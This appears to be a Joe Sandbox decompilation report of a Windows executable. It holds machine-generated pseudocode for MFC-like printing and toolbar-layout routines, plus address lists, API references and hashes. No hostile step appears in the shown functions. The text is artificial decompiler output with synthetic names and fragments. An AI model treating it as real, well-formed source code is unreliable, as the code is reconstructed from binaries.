                                            				struct HDC__* _t355;
                                            				intOrPtr _t357;
                                            				signed char _t383;
                                            				void* _t396;
                                            				signed int _t449;
                                            				intOrPtr* _t452;
                                            				intOrPtr* _t455;
                                            				struct _DOCINFOA _t458;
                                            				void* _t460;
                                            				signed char _t461;
                                            				void* _t463;
                                            				void* _t465;
                                            				void* _t466;
                                            				void* _t468;
                                            
                                            				E00406520(E0042A280, _t463);
                                            				_t466 = _t465 - 0x32c;
                                            				_t452 = __ecx;
                                            				 *((intOrPtr*)(_t463 - 0x24)) = __ecx;
                                            				E00428824(_t463 - 0x80);
                                            				 *(_t463 - 4) = 0;
                                            				if( *((short*)(E00413672() + 8)) != 0xe108) {
                                            					L6:
                                            					_t227 =  *((intOrPtr*)( *_t452 + 0xf4))(_t463 - 0x80);
                                            					__eflags = _t227;
                                            					if(_t227 != 0) {
                                            						_t229 =  *0x436980; // 0x436994
                                            						 *(_t463 - 0x3c) = _t229;
                                            						 *(_t463 - 4) = 1;
                                            						_t231 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
                                            						__eflags =  *(_t231 + 0x14) & 0x00000020;
                                            						if(( *(_t231 + 0x14) & 0x00000020) == 0) {
                                            							L12:
                                            							_t232 =  *0x436980; // 0x436994
                                            							 *(_t463 - 0x14) = _t232;
                                            							_t233 =  *(_t452 + 0x3c);
                                            							 *(_t463 - 4) = 0xa;
                                            							__eflags = _t233;
                                            							if(_t233 == 0) {
                                            								E004140EE(E00414C6C(_t452), _t463 - 0x14);
                                            							} else {
                                            								E00416B95(_t463 - 0x14, _t463, _t233 + 0x1c);
                                            							}
                                            							__eflags =  *((intOrPtr*)( *(_t463 - 0x14) - 8)) - 0x1f;
                                            							if(__eflags > 0) {
                                            								E00416D10(_t463 - 0x14, __eflags, 0x1f);
                                            							}
                                            							_t458 = 0x14;
                                            							E00406330(_t463 - 0x94, 0, _t458);
                                            							_t468 = _t466 + 0xc;
                                            							 *(_t463 - 0x90) =  *(_t463 - 0x14);
                                            							_t242 =  *0x436980; // 0x436994
                                            							 *(_t463 - 0x94) = _t458;
                                            							 *(_t463 - 0x38) = _t242;
                                            							_t243 =  *(_t463 - 0x3c);
                                            							 *(_t463 - 4) = 0xb;
                                            							__eflags =  *(_t243 - 8);
                                            							if( *(_t243 - 8) != 0) {
                                            								 *(_t463 - 0x8c) = _t243;
                                            								E00417CBF(_t243, E00416CC1(_t463 - 0x38, _t463, 0x104), 0x104);
                                            								_t460 = 0xf049;
                                            							} else {
                                            								 *(_t463 - 0x8c) = 0;
                                            								_t323 = E004102D0( *((intOrPtr*)(_t463 - 0x80)), _t463 - 0x18);
                                            								 *(_t463 - 4) = 0xc;
                                            								E00416B95(_t463 - 0x38, _t463, _t323);
                                            								 *(_t463 - 4) = 0xb;
                                            								E00416AEC(_t463 - 0x18);
                                            								_t460 = 0xf040;
                                            							}
                                            							E00419B00(_t463 - 0x34);
                                            							__eflags =  *(_t463 - 0x7c);
                                            							 *(_t463 - 4) = 0xd;
                                            							if( *(_t463 - 0x7c) == 0) {
                                            								E00419BB7(_t463 - 0x34,  *( *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c)) + 0x10));
                                            								 *(_t463 - 0x28) = 1;
                                            							}
                                            							 *((intOrPtr*)( *_t452 + 0xf8))(_t463 - 0x34, _t463 - 0x80);
                                            							__eflags =  *(_t463 - 0x7c);
                                            							if( *(_t463 - 0x7c) == 0) {
                                            								SetAbortProc( *(_t463 - 0x30), E00427F7F);
                                            							}
                                            							E004166CE(E00404DAE(), 0);
                                            							_push(_t452);
                                            							E00428772(_t463 - 0xf0, __eflags);
                                            							_t253 =  *0x436980; // 0x436994
                                            							 *(_t463 - 0x20) = _t253;
                                            							 *(_t463 - 4) = 0xf;
                                            							E004164C6(_t463 - 0xf0, 0xc9,  *(_t463 - 0x14));
                                            							_t256 = E00410292( *((intOrPtr*)(_t463 - 0x80)), _t463 - 0x18);
                                            							 *(_t463 - 4) = 0x10;
                                            							E004164C6(_t463 - 0xf0, 0xca,  *_t256);
                                            							 *(_t463 - 4) = 0xf;
                                            							E00416AEC(_t463 - 0x18);
                                            							E0041E3FA(_t463 - 0x20, _t460,  *(_t463 - 0x38));
                                            							E004164C6(_t463 - 0xf0, 0xcb,  *(_t463 - 0x20));
                                            							E0041668C(_t463 - 0xf0, 5);
                                            							UpdateWindow( *(_t463 - 0xd4));
                                            							__eflags =  *(_t463 - 0x7c);
                                            							if( *(_t463 - 0x7c) != 0) {
                                            								L27:
                                            								_t265 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
                                            								_t449 =  *(_t265 + 0x1a) & 0x0000ffff;
                                            								_t383 =  *(_t265 + 0x1c) & 0x0000ffff;
                                            								_t461 =  *(_t265 + 0x18) & 0x0000ffff;
                                            								__eflags = _t449 - _t383;
                                            								 *(_t463 - 0x10) = _t449;
                                            								if(_t449 < _t383) {
                                            									 *(_t463 - 0x10) = _t383;
                                            								}
                                            								_t266 =  *(_t265 + 0x1e) & 0x0000ffff;
                                            								__eflags =  *(_t463 - 0x10) - _t266;
                                            								if( *(_t463 - 0x10) > _t266) {
                                            									 *(_t463 - 0x10) = _t266;
                                            								}
                                            								__eflags = _t461 - _t383;
                                            								if(_t461 < _t383) {
                                            									_t461 = _t383;
                                            								}
                                            								__eflags = _t461 - _t266;
                                            								if(_t461 > _t266) {
                                            									_t461 = _t266;
                                            								}
                                            								__eflags =  *(_t463 - 0x10) - _t461;
                                            								asm("sbb eax, eax");
                                            								_t268 = (_t266 & 0x000000fe) + 1;
                                            								__eflags =  *(_t463 - 0x10) - 0xffff;
                                            								 *((intOrPtr*)(_t463 - 0x18)) = _t268;
                                            								if(__eflags != 0) {
                                            									_t151 = _t463 - 0x10;
                                            									 *_t151 =  *(_t463 - 0x10) + _t268;
                                            									__eflags =  *_t151;
                                            								} else {
                                            									 *(_t463 - 0x10) = 0xffff;
                                            								}
                                            								E00417214(_t463 - 0x20, __eflags, 0xf043);
                                            								__eflags =  *(_t463 - 0x7c);
                                            								 *(_t463 - 0x1c) = 0;
                                            								if( *(_t463 - 0x7c) == 0) {
                                            									__eflags = _t461 -  *(_t463 - 0x10);
                                            									 *(_t463 - 0x6c) = _t461;
                                            									if(_t461 ==  *(_t463 - 0x10)) {
                                            										goto L53;
                                            									} else {
                                            										while(1) {
                                            											 *((intOrPtr*)( *_t452 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
                                            											__eflags =  *(_t463 - 0x70);
                                            											if( *(_t463 - 0x70) == 0) {
                                            												goto L51;
                                            											}
                                            											wsprintfA(_t463 - 0x140,  *(_t463 - 0x20),  *(_t463 - 0x6c));
                                            											_t468 = _t468 + 0xc;
                                            											E004164C6(_t463 - 0xf0, 0xcc, _t463 - 0x140);
                                            											_t290 = GetDeviceCaps( *(_t463 - 0x2c), 0xa);
                                            											SetRect(_t463 - 0x5c, 0, 0, GetDeviceCaps( *(_t463 - 0x2c), 8), _t290);
                                            											DPtoLP( *(_t463 - 0x2c), _t463 - 0x5c, 2);
                                            											_t296 = StartPage( *(_t463 - 0x30));
                                            											__eflags = _t296;
                                            											if(_t296 < 0) {
                                            												L50:
                                            												_t452 =  *((intOrPtr*)(_t463 - 0x24));
                                            												 *(_t463 - 0x1c) = 1;
                                            											} else {
                                            												__eflags =  *0x439c48; // 0x1
                                            												_t455 =  *((intOrPtr*)(_t463 - 0x24));
                                            												if(__eflags != 0) {
                                            													 *((intOrPtr*)( *_t455 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
                                            												}
                                            												 *((intOrPtr*)( *_t455 + 0xfc))(_t463 - 0x34, _t463 - 0x80);
                                            												__eflags = EndPage( *(_t463 - 0x30));
                                            												if(__eflags < 0) {
                                            													goto L50;
                                            												} else {
                                            													_t300 = E00427F7F(__eflags,  *(_t463 - 0x30), 0);
                                            													__eflags = _t300;
                                            													if(_t300 == 0) {
                                            														goto L50;
                                            													} else {
                                            														_t452 =  *((intOrPtr*)(_t463 - 0x24));
                                            														 *(_t463 - 0x6c) =  *(_t463 - 0x6c) +  *((intOrPtr*)(_t463 - 0x18));
                                            														__eflags =  *(_t463 - 0x6c) -  *(_t463 - 0x10);
                                            														if( *(_t463 - 0x6c) !=  *(_t463 - 0x10)) {
                                            															continue;
                                            														} else {
                                            														}
                                            													}
                                            												}
                                            											}
                                            											goto L51;
                                            										}
                                            										goto L51;
                                            									}
                                            								} else {
                                            									 *((intOrPtr*)( *_t452 + 0xdc))(_t463 - 0x34, _t463 - 0x80);
                                            									 *((intOrPtr*)( *_t452 + 0xfc))(_t463 - 0x34, _t463 - 0x80);
                                            									L51:
                                            									__eflags =  *(_t463 - 0x7c);
                                            									if( *(_t463 - 0x7c) == 0) {
                                            										__eflags =  *(_t463 - 0x1c);
                                            										if( *(_t463 - 0x1c) != 0) {
                                            											AbortDoc( *(_t463 - 0x30));
                                            										} else {
                                            											L53:
                                            											EndDoc( *(_t463 - 0x30));
                                            										}
                                            									}
                                            								}
                                            								E004166CE(E00404DAE(), 1);
                                            								 *((intOrPtr*)( *_t452 + 0x100))(_t463 - 0x34, _t463 - 0x80);
                                            								E00413F6F(_t463 - 0xf0);
                                            								E00419BEE(_t463 - 0x34);
                                            							} else {
                                            								_t310 = StartDocA( *(_t463 - 0x30), _t463 - 0x94);
                                            								__eflags = _t310 - 0xffffffff;
                                            								if(_t310 != 0xffffffff) {
                                            									goto L27;
                                            								} else {
                                            									E004166CE(E00404DAE(), 1);
                                            									 *((intOrPtr*)( *_t452 + 0x100))(_t463 - 0x34, _t463 - 0x80);
                                            									E00413F6F(_t463 - 0xf0);
                                            									E00419BEE(_t463 - 0x34);
                                            									_push(0xffffffff);
                                            									_push(0);
                                            									_push(0xf106);
                                            									E0041BB7E(_t463 - 0x34, __eflags);
                                            								}
                                            							}
                                            							 *(_t463 - 4) = 0xe;
                                            							E00416AEC(_t463 - 0x20);
                                            							 *(_t463 - 4) = 0xd;
                                            							 *((intOrPtr*)(_t463 - 0xf0)) = 0x42cb34;
                                            							E00411D13(_t463 - 0xf0);
                                            							 *(_t463 - 4) = 0xb;
                                            							E00419C1F(_t463 - 0x34);
                                            							 *(_t463 - 4) = 0xa;
                                            							E00416AEC(_t463 - 0x38);
                                            							 *(_t463 - 4) = 1;
                                            							_t396 = _t463 - 0x14;
                                            						} else {
                                            							__eflags =  *(_t463 - 0x7c);
                                            							if( *(_t463 - 0x7c) != 0) {
                                            								goto L12;
                                            							} else {
                                            								E00416B16(_t463 - 0x1c, _t463, 0xf045);
                                            								 *(_t463 - 4) = 2;
                                            								E00416B16(_t463 - 0x40, _t463, 0xf046);
                                            								 *(_t463 - 4) = 3;
                                            								E00416B16(_t463 - 0x44, _t463, 0xf047);
                                            								 *(_t463 - 4) = 4;
                                            								E00416B16(_t463 - 0x10, _t463, 0xf048);
                                            								_push(0);
                                            								_push( *((intOrPtr*)(_t463 - 0x44)));
                                            								 *(_t463 - 4) = 5;
                                            								_push(6);
                                            								_push( *((intOrPtr*)(_t463 - 0x40)));
                                            								_push( *(_t463 - 0x1c));
                                            								_push(0);
                                            								E00410385(_t463 - 0x338);
                                            								 *(_t463 - 4) = 6;
                                            								 *(_t463 - 0x2ac) =  *(_t463 - 0x10);
                                            								_t335 = E004104E7(0);
                                            								__eflags = _t335 - 1;
                                            								if(_t335 == 1) {
                                            									_push(_t463 - 0x18);
                                            									_t337 = E004105C2(_t463 - 0x338);
                                            									 *(_t463 - 4) = 8;
                                            									E00416B95(_t463 - 0x3c, _t463, _t337);
                                            									 *(_t463 - 4) = 6;
                                            									E00416AEC(_t463 - 0x18);
                                            									 *(_t463 - 4) = 9;
                                            									E00416AEC(_t463 - 0x28c);
                                            									 *(_t463 - 4) = 5;
                                            									E00411D13(_t463 - 0x338);
                                            									 *(_t463 - 4) = 4;
                                            									E00416AEC(_t463 - 0x10);
                                            									 *(_t463 - 4) = 3;
                                            									E00416AEC(_t463 - 0x44);
                                            									 *(_t463 - 4) = 2;
                                            									E00416AEC(_t463 - 0x40);
                                            									 *(_t463 - 4) = 1;
                                            									E00416AEC(_t463 - 0x1c);
                                            									goto L12;
                                            								} else {
                                            									 *(_t463 - 4) = 7;
                                            									E00416AEC(_t463 - 0x28c);
                                            									 *(_t463 - 4) = 5;
                                            									E00411D13(_t463 - 0x338);
                                            									 *(_t463 - 4) = 4;
                                            									E00416AEC(_t463 - 0x10);
                                            									 *(_t463 - 4) = 3;
                                            									E00416AEC(_t463 - 0x44);
                                            									 *(_t463 - 4) = 2;
                                            									E00416AEC(_t463 - 0x40);
                                            									 *(_t463 - 4) = 1;
                                            									_t396 = _t463 - 0x1c;
                                            								}
                                            							}
                                            						}
                                            						E00416AEC(_t396);
                                            						 *(_t463 - 4) = 0;
                                            						E00416AEC(_t463 - 0x3c);
                                            					}
                                            				} else {
                                            					_t353 =  *((intOrPtr*)( *((intOrPtr*)(E00424BFB() + 4)) + 0xac));
                                            					if(_t353 == 0 ||  *((intOrPtr*)(_t353 + 0x10)) != 3) {
                                            						L5:
                                            						 *(_t463 - 0x74) = 1;
                                            						goto L6;
                                            					} else {
                                            						_t355 = CreateDCA( *(_t353 + 0x1c),  *(_t353 + 0x18),  *(_t353 + 0x20), 0);
                                            						_t448 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
                                            						 *( *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c)) + 0x10) = _t355;
                                            						_t357 =  *((intOrPtr*)( *((intOrPtr*)(_t463 - 0x80)) + 0x5c));
                                            						_t473 =  *((intOrPtr*)(_t357 + 0x10));
                                            						if( *((intOrPtr*)(_t357 + 0x10)) != 0) {
                                            							goto L5;
                                            						} else {
                                            							_push(0xffffffff);
                                            							_push(0);
                                            							_push(0xf106);
                                            							E0041BB7E(_t448, _t473);
                                            						}
                                            					}
                                            				}
                                            				 *(_t463 - 4) =  *(_t463 - 4) | 0xffffffff;
                                            				_t228 = E004288AC(_t463 - 0x80);
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t463 - 0xc));
                                            				return _t228;
                                            			}
                                            0x00428541
                                            0x00428545
                                            0x00428548
                                            0x0042854a
                                            0x0042854a
                                            0x0042854d
                                            0x0042854f
                                            0x00428551
                                            0x00428551
                                            0x00428553
                                            0x00428555
                                            0x00428557
                                            0x00428557
                                            0x00428559
                                            0x00428561
                                            0x00428565
                                            0x00428566
                                            0x00428569
                                            0x0042856c
                                            0x00428573
                                            0x00428573
                                            0x00428573
                                            0x0042856e
                                            0x0042856e
                                            0x0042856e
                                            0x0042857e
                                            0x00428583
                                            0x00428586
                                            0x00428589
                                            0x004285b4
                                            0x004285b7
                                            0x004285ba
                                            0x00000000
                                            0x004285c0
                                            0x004285c6
                                            0x004285d2
                                            0x004285d8
                                            0x004285db
                                            0x00000000
                                            0x00000000
                                            0x004285ee
                                            0x004285f4
                                            0x00428609
                                            0x00428613
                                            0x00428626
                                            0x00428635
                                            0x0042863e
                                            0x00428644
                                            0x00428646
                                            0x004286a8
                                            0x004286a8
                                            0x004286ab
                                            0x00428648
                                            0x00428648
                                            0x0042864e
                                            0x00428651
                                            0x0042865f
                                            0x0042865f
                                            0x00428671
                                            0x00428680
                                            0x00428682
                                            0x00000000
                                            0x00428684
                                            0x00428688
                                            0x0042868d
                                            0x0042868f
                                            0x00000000
                                            0x00428691
                                            0x00428694
                                            0x00428697
                                            0x0042869d
                                            0x004286a0
                                            0x00000000
                                            0x00000000
                                            0x004286a6
                                            0x004286a0
                                            0x0042868f
                                            0x00428682
                                            0x00000000
                                            0x00428646
                                            0x00000000
                                            0x004285c6
                                            0x0042858b
                                            0x00428597
                                            0x004285a9
                                            0x004286b2
                                            0x004286b2
                                            0x004286b5
                                            0x004286b7
                                            0x004286ba
                                            0x004286ca
                                            0x004286bc
                                            0x004286bc
                                            0x004286bf
                                            0x004286bf
                                            0x004286ba
                                            0x004286b5
                                            0x004286d9
                                            0x004286ea
                                            0x004286f6
                                            0x004286fe
                                            0x004284cb
                                            0x004284d5
                                            0x004284db
                                            0x004284de
                                            0x00000000
                                            0x004284e0
                                            0x004284e9
                                            0x004284fa
                                            0x00428506
                                            0x0042850e
                                            0x00428513
                                            0x00428515
                                            0x00428516
                                            0x0042851b
                                            0x0042851b
                                            0x004284de
                                            0x00428706
                                            0x0042870a
                                            0x00428715
                                            0x00428719
                                            0x00428723
                                            0x0042872b
                                            0x0042872f
                                            0x00428737
                                            0x0042873b
                                            0x00428740
                                            0x00428744
                                            0x004281bf
                                            0x004281bf
                                            0x004281c2
                                            0x00000000
                                            0x004281c8
                                            0x004281d0
                                            0x004281dd
                                            0x004281e1
                                            0x004281ee
                                            0x004281f2
                                            0x004281ff
                                            0x00428203
                                            0x00428208
                                            0x0042820f
                                            0x00428212
                                            0x00428216
                                            0x00428218
                                            0x0042821b
                                            0x0042821e
                                            0x0042821f
                                            0x0042822d
                                            0x00428231
                                            0x00428237
                                            0x0042823c
                                            0x0042823f
                                            0x00428298
                                            0x00428299
                                            0x004282a2
                                            0x004282a6
                                            0x004282ae
                                            0x004282b2
                                            0x004282bd
                                            0x004282c1
                                            0x004282cc
                                            0x004282d0
                                            0x004282d8
                                            0x004282dc
                                            0x004282e4
                                            0x004282e8
                                            0x004282f0
                                            0x004282f4
                                            0x004282fc
                                            0x00428300
                                            0x00000000
                                            0x00428241
                                            0x00428247
                                            0x0042824b
                                            0x00428256
                                            0x0042825a
                                            0x00428262
                                            0x00428266
                                            0x0042826e
                                            0x00428272
                                            0x0042827a
                                            0x0042827e
                                            0x00428283
                                            0x00428287
                                            0x00428287
                                            0x0042823f
                                            0x004281c2
                                            0x00428747
                                            0x0042874f
                                            0x00428752
                                            0x00428752
                                            0x00428135
                                            0x0042813d
                                            0x00428145
                                            0x00428186
                                            0x00428186
                                            0x00000000
                                            0x0042814d
                                            0x0042815a
                                            0x00428163
                                            0x00428166
                                            0x0042816c
                                            0x0042816f
                                            0x00428172
                                            0x00000000
                                            0x00428174
                                            0x00428174
                                            0x00428176
                                            0x00428177
                                            0x0042817c
                                            0x0042817c
                                            0x00428172
                                            0x00428145
                                            0x00428757
                                            0x0042875e
                                            0x00428769
                                            0x00428771

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00428108
                                              • Part of subcall function 00428824: __EH_prolog.LIBCMT ref: 00428829
                                              • Part of subcall function 00413672: GetMessageTime.USER32(Function_0002440D), ref: 00413684
                                              • Part of subcall function 00413672: GetMessagePos.USER32 ref: 0041368D
                                            • CreateDCA.GDI32(?,?,?,00000000), ref: 0042815A
                                            • SetAbortProc.GDI32(?,Function_00027F7F), ref: 00428421
                                            • UpdateWindow.USER32(?), ref: 004284C0
                                            • StartDocA.GDI32(?,?), ref: 004284D5
                                            • EndDoc.GDI32(?), ref: 004286BF
                                              • Part of subcall function 0041BB7E: __EH_prolog.LIBCMT ref: 0041BB83
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: H_prolog$Message$AbortCreateProcStartTimeUpdateWindow
                                            • String ID:
                                            • API String ID: 900908304-0
                                            • Opcode ID: a9a56cf884ea0ddfdff13adf36a7dc5d90a4e26b108d0df44a24b90832e2b856
                                            • Instruction ID: b1286eb136246b1ee29ef1a1e14188ff5951a4f8bc16bfaf6e35fdac19ebc766
                                            • Opcode Fuzzy Hash: a9a56cf884ea0ddfdff13adf36a7dc5d90a4e26b108d0df44a24b90832e2b856
                                            • Instruction Fuzzy Hash: 1C127070E01219EFCF14EBA4D885AEDBBB4BF14308F5040AEE515B3292DB789A44DF65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 93%
                                            			E0041D717(void* __ebx, intOrPtr __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				signed int _v16;
                                            				struct tagRECT _v32;
                                            				int _v36;
                                            				signed int _v40;
                                            				intOrPtr _v44;
                                            				intOrPtr _v48;
                                            				long _v56;
                                            				signed int _v60;
                                            				void* _v64;
                                            				intOrPtr _v68;
                                            				intOrPtr* _v72;
                                            				struct tagRECT _v88;
                                            				struct tagRECT _v104;
                                            				int _v136;
                                            				char _v144;
                                            				intOrPtr* _t191;
                                            				intOrPtr _t197;
                                            				signed int _t199;
                                            				intOrPtr* _t205;
                                            				intOrPtr _t213;
                                            				signed int _t215;
                                            				long _t218;
                                            				signed int _t219;
                                            				signed int _t225;
                                            				void* _t229;
                                            				intOrPtr* _t231;
                                            				intOrPtr _t238;
                                            				intOrPtr _t239;
                                            				int _t244;
                                            				signed int _t245;
                                            				signed int _t249;
                                            				signed int _t251;
                                            				signed int _t256;
                                            				long _t263;
                                            				intOrPtr _t264;
                                            				int _t269;
                                            				signed int _t273;
                                            				signed int _t277;
                                            				long _t285;
                                            				void* _t293;
                                            				signed int _t294;
                                            				signed int _t295;
                                            				signed int _t299;
                                            				intOrPtr _t305;
                                            				long _t312;
                                            				int _t322;
                                            				long _t327;
                                            				signed int _t333;
                                            				intOrPtr _t336;
                                            				RECT* _t341;
                                            				signed int _t342;
                                            				intOrPtr* _t343;
                                            				int _t345;
                                            
                                            				_t293 = __ebx;
                                            				_t336 = __ecx;
                                            				_v68 = __ecx;
                                            				_t191 = E0041E6BA( &_v64, _a8, _a12);
                                            				_t341 = _t336 + 0x94;
                                            				_v12 =  *_t191;
                                            				_v8 =  *((intOrPtr*)(_t191 + 4));
                                            				if(IsRectEmpty(_t341) != 0) {
                                            					GetClientRect( *(E00414C6C(_t336) + 0x1c),  &_v88);
                                            					_t197 = _v88.right - _v88.left;
                                            					_t305 = _v88.bottom - _v88.top;
                                            				} else {
                                            					_t197 = _t341->right - _t341->left;
                                            					_t305 = _t341->bottom - _t341->top;
                                            				}
                                            				_t342 = 0;
                                            				_v48 = _t197;
                                            				_v44 = _t305;
                                            				if( *((intOrPtr*)(_t336 + 0x90)) == 0) {
                                            					_v136 = BeginDeferWindowPos( *(_t336 + 0x84));
                                            				} else {
                                            					_v136 = 0;
                                            				}
                                            				_t199 =  *0x439bf0; // 0x2
                                            				_push(_t293);
                                            				_t294 =  *0x439bf4; // 0x2
                                            				_v40 = _t342;
                                            				_t295 =  ~_t294;
                                            				_v56 =  ~_t199;
                                            				_v36 = _t342;
                                            				_v16 = _t342;
                                            				if( *(_t336 + 0x84) <= _t342) {
                                            					L73:
                                            					if( *((intOrPtr*)(_t336 + 0x90)) == _t342 && _v136 != _t342) {
                                            						EndDeferWindowPos(_v136);
                                            					}
                                            					SetRectEmpty( &_v104);
                                            					E0041F52D(_t336,  &_v104, _a12);
                                            					if(_a8 == _t342 || _a12 == _t342) {
                                            						if(_v12 != _t342) {
                                            							_v12 = _v12 + _v104.left - _v104.right;
                                            						}
                                            					}
                                            					if(_a8 == _t342 || _a12 != _t342) {
                                            						if(_v8 != _t342) {
                                            							_v8 = _v8 + _v104.top - _v104.bottom;
                                            						}
                                            					}
                                            					_t205 = _a4;
                                            					 *_t205 = _v12;
                                            					 *((intOrPtr*)(_t205 + 4)) = _v8;
                                            					return _t205;
                                            				} else {
                                            					do {
                                            						_t343 = E0041DD28(_t336, _v16);
                                            						_v72 = _t343;
                                            						_t213 =  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _v16 * 4));
                                            						if(_t343 == 0) {
                                            							if(_t213 != 0) {
                                            								goto L71;
                                            							}
                                            							L58:
                                            							_t215 = _v40;
                                            							if(_t215 != 0) {
                                            								if(_a12 == 0) {
                                            									_t312 = _v56 + _t215 -  *0x439bf0;
                                            									_v56 = _t312;
                                            									if(_v12 <= _t312) {
                                            										_v12 = _t312;
                                            									}
                                            									if(_v8 <= _t295) {
                                            										_v8 = _t295;
                                            									}
                                            									_t299 =  *0x439bf4; // 0x2
                                            									_t295 =  ~_t299;
                                            								} else {
                                            									_t295 = _t295 + _t215 -  *0x439bf4;
                                            									_t218 = _v56;
                                            									if(_v12 <= _t218) {
                                            										_v12 = _t218;
                                            									}
                                            									if(_v8 <= _t295) {
                                            										_v8 = _t295;
                                            									}
                                            									_t219 =  *0x439bf0; // 0x2
                                            									_v56 =  ~_t219;
                                            								}
                                            								_v40 = _v40 & 0x00000000;
                                            							}
                                            							goto L71;
                                            						}
                                            						if( *((intOrPtr*)( *_t343 + 0xc8))() == 0) {
                                            							L51:
                                            							if(_v36 != 0) {
                                            								goto L71;
                                            							}
                                            							L52:
                                            							 *((intOrPtr*)( *_t343 + 0xcc))( &_v136);
                                            							goto L71;
                                            						}
                                            						_t225 =  *(_t343 + 0x64);
                                            						if((_t225 & 0x00000004) == 0 || (_t225 & 0x00000001) == 0) {
                                            							asm("sbb eax, eax");
                                            							_t229 = ( ~(_t225 & 0x0000a000) & 0x000000fa) + 0x10;
                                            						} else {
                                            							_t229 = 6;
                                            						}
                                            						_t231 =  *((intOrPtr*)( *_t343 + 0xbc))( &_v144, 0xffffffff, _t229);
                                            						_t327 = _v56;
                                            						_v64 =  *_t231;
                                            						_v60 =  *((intOrPtr*)(_t231 + 4));
                                            						_v32.left = _t327;
                                            						_v32.bottom =  *((intOrPtr*)(_t231 + 4)) + _t295;
                                            						_v32.right =  *_t231 + _t327;
                                            						_v32.top = _t295;
                                            						GetWindowRect( *(_t343 + 0x1c),  &_v88);
                                            						E0041A2F1(_t336,  &_v88);
                                            						_t322 = 0;
                                            						if(_a12 == 0) {
                                            							_t238 = _v88.top;
                                            							if(_t238 > _v32.top &&  *((intOrPtr*)(_t336 + 0x78)) == 0) {
                                            								OffsetRect( &_v32, 0, _t238 - _v32.top);
                                            								_t322 = 0;
                                            							}
                                            							_t239 = _v32.bottom;
                                            							if(_t239 > _v44 &&  *((intOrPtr*)(_t336 + 0x78)) == _t322) {
                                            								_t333 = _v44 - _t239 - _v32.top -  *0x439bf4;
                                            								_t256 = _t333;
                                            								if(_t333 <= _t295) {
                                            									_t256 = _t295;
                                            								}
                                            								OffsetRect( &_v32, _t322, _t256 - _v32.top);
                                            								_t322 = 0;
                                            							}
                                            							if(_v36 == _t322) {
                                            								if(_v32.top < _v44 -  *0x439bf4) {
                                            									goto L44;
                                            								}
                                            								_t249 = _v16;
                                            								if(_t249 <= _t322 ||  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _t249 * 4 - 4)) == _t322) {
                                            									goto L44;
                                            								} else {
                                            									goto L56;
                                            								}
                                            							} else {
                                            								_t251 =  *0x439bf4; // 0x2
                                            								_v36 = _t322;
                                            								OffsetRect( &_v32, _t322,  ~(_v32.top + _t251));
                                            								L44:
                                            								_t244 = EqualRect( &_v32,  &_v88);
                                            								if(_t244 == 0) {
                                            									if( *((intOrPtr*)(_t336 + 0x90)) == _t244 && ( *(_t343 + 0x64) & 0x00000001) == 0) {
                                            										asm("movsd");
                                            										asm("movsd");
                                            										asm("movsd");
                                            										asm("movsd");
                                            										_t343 = _v72;
                                            										_t336 = _v68;
                                            									}
                                            									E004152C7( &_v136,  *(_t343 + 0x1c),  &_v32);
                                            								}
                                            								_t245 = _v64;
                                            								_t295 = _v32.top -  *0x439bf4 + _v60;
                                            								if(_v40 > _t245) {
                                            									goto L52;
                                            								} else {
                                            									_v40 = _t245;
                                            									goto L51;
                                            								}
                                            							}
                                            						} else {
                                            							_t263 = _v88.left;
                                            							if(_t263 > _v32.left &&  *((intOrPtr*)(_t336 + 0x78)) == 0) {
                                            								OffsetRect( &_v32, _t263 - _v32.left, 0);
                                            								_t322 = 0;
                                            							}
                                            							_t264 = _v32.right;
                                            							if(_t264 <= _v48 ||  *((intOrPtr*)(_t336 + 0x78)) != _t322) {
                                            								L22:
                                            								if(_v36 == _t322) {
                                            									if(_v32.left < _v48 -  *0x439bf0) {
                                            										L27:
                                            										_t269 = EqualRect( &_v32,  &_v88);
                                            										if(_t269 == 0) {
                                            											if( *((intOrPtr*)(_t336 + 0x90)) == _t269 && ( *(_t343 + 0x64) & 0x00000001) == 0) {
                                            												asm("movsd");
                                            												asm("movsd");
                                            												asm("movsd");
                                            												asm("movsd");
                                            												_t343 = _v72;
                                            												_t336 = _v68;
                                            											}
                                            											E004152C7( &_v136,  *(_t343 + 0x1c),  &_v32);
                                            										}
                                            										_v56 = _v64 -  *0x439bf0 + _v32.left;
                                            										_t273 = _v60;
                                            										if(_v40 <= _t273) {
                                            											_v40 = _t273;
                                            										}
                                            										goto L52;
                                            									}
                                            									_t249 = _v16;
                                            									if(_t249 <= _t322 ||  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x80)) + _t249 * 4 - 4)) == _t322) {
                                            										goto L27;
                                            									} else {
                                            										L56:
                                            										_t345 = 1;
                                            										E004115B1(_t336 + 0x7c, _t249, _t322, _t345);
                                            										_v36 = _t345;
                                            										goto L58;
                                            									}
                                            								}
                                            								_t277 =  *0x439bf0; // 0x2
                                            								_v36 = _t322;
                                            								OffsetRect( &_v32,  ~(_t277 + _v32.left), _t322);
                                            								goto L27;
                                            							} else {
                                            								_t285 = _v48 - _t264 -  *0x439bf0 - _v32.left;
